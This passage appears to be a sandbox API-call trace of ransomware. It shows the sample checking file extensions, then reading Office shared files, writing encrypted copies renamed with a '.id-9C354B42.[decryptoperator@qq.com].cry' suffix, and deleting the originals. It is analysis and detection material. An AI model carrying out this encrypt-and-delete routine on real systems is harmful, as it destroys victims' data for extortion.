Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.077] lstrlenW (lpString=".doc") returned 4 [0051.077] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0051.077] lstrlenW (lpString=".docx") returned 5 [0051.077] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0051.077] lstrlenW (lpString=".pdf") returned 4 [0051.077] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0051.077] lstrlenW (lpString=".xls") returned 4 [0051.077] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0051.077] lstrlenW (lpString=".xlsx") returned 5 [0051.077] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0051.077] lstrlenW (lpString=".ppt") returned 4 [0051.077] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0051.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.077] lstrlenW (lpString=".zip") returned 4 [0051.077] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0051.077] lstrlenW (lpString=".rar") returned 4 [0051.077] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0051.077] lstrlenW (lpString=".bz2") returned 4 [0051.077] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0051.077] lstrlenW (lpString=".7z") returned 3 [0051.077] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0051.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.078] lstrlenW (lpString=".dbf") returned 4 [0051.078] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0051.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.078] lstrlenW (lpString=".1cd") returned 4 [0051.078] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0051.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.078] lstrlenW (lpString=".jpg") returned 4 [0051.078] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0051.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.078] lstrlenW (lpString=".doc") returned 4 [0051.078] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0051.078] lstrlenW (lpString=".docx") returned 5 [0051.078] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0051.078] lstrlenW (lpString=".pdf") returned 4 [0051.078] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0051.078] lstrlenW (lpString=".xls") returned 4 [0051.078] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0051.078] lstrlenW (lpString=".xlsx") returned 5 [0051.078] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0051.078] lstrlenW (lpString=".ppt") returned 4 [0051.078] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0051.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.078] lstrlenW (lpString=".zip") returned 4 [0051.078] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0051.078] lstrlenW (lpString=".rar") returned 4 [0051.078] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0051.078] lstrlenW (lpString=".bz2") returned 4 [0051.078] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0051.078] lstrlenW (lpString=".7z") returned 3 [0051.079] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0051.079] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.079] lstrlenW (lpString=".dbf") returned 4 [0051.079] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0051.079] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.079] lstrlenW (lpString=".1cd") returned 4 [0051.079] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0051.079] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.079] lstrlenW (lpString=".jpg") returned 4 [0051.079] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0051.079] lstrcmpiW (lpString1=".EXE", lpString2=".cry") returned 1 [0051.079] lstrlenW (lpString="DWTRIG20.EXE") returned 12 [0051.079] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.111] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=629664) returned 1 [0051.111] CloseHandle (hObject=0x200) returned 1 [0051.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 0x20 [0051.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.111] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.111] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.112] GetLastError () returned 0x0 [0051.112] ReadFile (in: hFile=0x200, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x99ba0, lpOverlapped=0x0) returned 1 [0051.137] WriteFile (in: hFile=0x194, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x99bb0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x99bb0, lpOverlapped=0x0) returned 1 [0051.150] ReadFile (in: hFile=0x200, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.150] WriteFile (in: hFile=0x194, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.150] SetEndOfFile (hFile=0x194) returned 1 [0051.150] CloseHandle (hObject=0x194) returned 1 [0051.150] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.150] SetEndOfFile (hFile=0x200) returned 1 [0051.156] CloseHandle (hObject=0x200) returned 1 [0051.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.157] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 1 [0051.159] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.159] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.159] lstrlenW (lpString=".doc") returned 4 [0051.159] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.159] lstrlenW (lpString=".docx") returned 5 [0051.159] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.159] lstrlenW (lpString=".pdf") returned 4 [0051.159] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.159] lstrlenW (lpString=".xls") returned 4 [0051.159] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.159] lstrlenW (lpString=".xlsx") returned 5 [0051.159] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.159] lstrlenW (lpString=".ppt") returned 4 [0051.159] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.159] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.160] lstrlenW (lpString=".zip") returned 4 [0051.160] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.160] lstrlenW (lpString=".rar") returned 4 [0051.160] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.160] lstrlenW (lpString=".bz2") returned 4 [0051.160] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.160] lstrlenW (lpString=".7z") returned 3 [0051.160] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.160] lstrlenW (lpString=".dbf") returned 4 [0051.160] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.160] lstrlenW (lpString=".1cd") returned 4 [0051.160] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.160] lstrlenW (lpString=".jpg") returned 4 [0051.160] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.160] lstrlenW (lpString=".doc") returned 4 [0051.160] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.160] lstrlenW (lpString=".docx") returned 5 [0051.160] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.160] lstrlenW (lpString=".pdf") returned 4 [0051.160] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.160] lstrlenW (lpString=".xls") returned 4 [0051.160] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.160] lstrlenW (lpString=".xlsx") returned 5 [0051.160] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.160] lstrlenW (lpString=".ppt") returned 4 [0051.160] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.160] lstrlenW (lpString=".zip") returned 4 [0051.160] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.161] lstrlenW (lpString=".rar") returned 4 [0051.161] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.161] lstrlenW (lpString=".bz2") returned 4 [0051.161] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.161] lstrlenW (lpString=".7z") returned 3 [0051.161] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.161] lstrlenW (lpString=".dbf") returned 4 [0051.161] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.161] lstrlenW (lpString=".1cd") returned 4 [0051.161] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.161] lstrlenW (lpString=".jpg") returned 4 [0051.161] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.161] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0051.161] lstrlenW (lpString="EEINTL.DLL") returned 10 [0051.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.162] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=64096) returned 1 [0051.162] CloseHandle (hObject=0x200) returned 1 [0051.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 0x20 [0051.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.162] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.163] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.163] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.163] GetLastError () returned 0x0 [0051.163] ReadFile (in: hFile=0x200, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xfa60, lpOverlapped=0x0) returned 1 [0051.393] WriteFile (in: hFile=0x194, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xfa70, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xfa70, lpOverlapped=0x0) returned 1 [0051.395] ReadFile (in: hFile=0x200, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.395] WriteFile (in: hFile=0x194, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0051.395] SetEndOfFile (hFile=0x194) returned 1 [0051.395] CloseHandle (hObject=0x194) returned 1 [0051.395] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.395] SetEndOfFile (hFile=0x200) returned 1 [0051.396] CloseHandle (hObject=0x200) returned 1 [0051.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.397] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 1 [0051.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.397] lstrlenW (lpString=".doc") returned 4 [0051.397] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.397] lstrlenW (lpString=".docx") returned 5 [0051.397] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0051.397] lstrlenW (lpString=".pdf") returned 4 [0051.397] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.397] lstrlenW (lpString=".xls") returned 4 [0051.397] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.397] lstrlenW (lpString=".xlsx") returned 5 [0051.397] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0051.397] lstrlenW (lpString=".ppt") returned 4 [0051.397] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.397] lstrlenW (lpString=".zip") returned 4 [0051.397] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.397] lstrlenW (lpString=".rar") returned 4 [0051.397] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.397] lstrlenW (lpString=".bz2") returned 4 [0051.397] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.397] lstrlenW (lpString=".7z") returned 3 [0051.397] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.397] lstrlenW (lpString=".dbf") returned 4 [0051.397] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.398] lstrlenW (lpString=".1cd") returned 4 [0051.398] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.398] lstrlenW (lpString=".jpg") returned 4 [0051.398] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.398] lstrlenW (lpString=".doc") returned 4 [0051.398] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.398] lstrlenW (lpString=".docx") returned 5 [0051.398] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0051.398] lstrlenW (lpString=".pdf") returned 4 [0051.398] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.398] lstrlenW (lpString=".xls") returned 4 [0051.398] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.398] lstrlenW (lpString=".xlsx") returned 5 [0051.398] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0051.398] lstrlenW (lpString=".ppt") returned 4 [0051.398] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.398] lstrlenW (lpString=".zip") returned 4 [0051.398] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.398] lstrlenW (lpString=".rar") returned 4 [0051.398] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.398] lstrlenW (lpString=".bz2") returned 4 [0051.398] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.398] lstrlenW (lpString=".7z") returned 3 [0051.398] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.398] lstrlenW (lpString=".dbf") returned 4 [0051.398] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.398] lstrlenW (lpString=".1cd") returned 4 [0051.398] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.398] lstrlenW (lpString=".jpg") returned 4 [0051.398] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.399] lstrcmpiW (lpString1=".EXE", lpString2=".cry") returned 1 [0051.399] lstrlenW (lpString="EQNEDT32.EXE") returned 12 [0051.399] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0051.441] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=543304) returned 1 [0051.441] CloseHandle (hObject=0x1bc) returned 1 [0051.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 0x20 [0051.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0051.449] GetLastError () returned 0x0 [0051.449] ReadFile (in: hFile=0x21c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x84a48, lpOverlapped=0x0) returned 1 [0051.496] WriteFile (in: hFile=0x178, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x84a50, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x84a50, lpOverlapped=0x0) returned 1 [0051.517] ReadFile (in: hFile=0x21c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.517] WriteFile (in: hFile=0x178, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.517] SetEndOfFile (hFile=0x178) returned 1 [0051.517] CloseHandle (hObject=0x178) returned 1 [0051.518] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.518] SetEndOfFile (hFile=0x21c) returned 1 [0051.557] CloseHandle (hObject=0x21c) returned 1 [0051.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.557] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 1 [0051.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.568] lstrlenW (lpString=".doc") returned 4 [0051.568] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.569] lstrlenW (lpString=".docx") returned 5 [0051.569] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0051.569] lstrlenW (lpString=".pdf") returned 4 [0051.569] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.569] lstrlenW (lpString=".xls") returned 4 [0051.569] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.569] lstrlenW (lpString=".xlsx") returned 5 [0051.569] lstrcmpiW 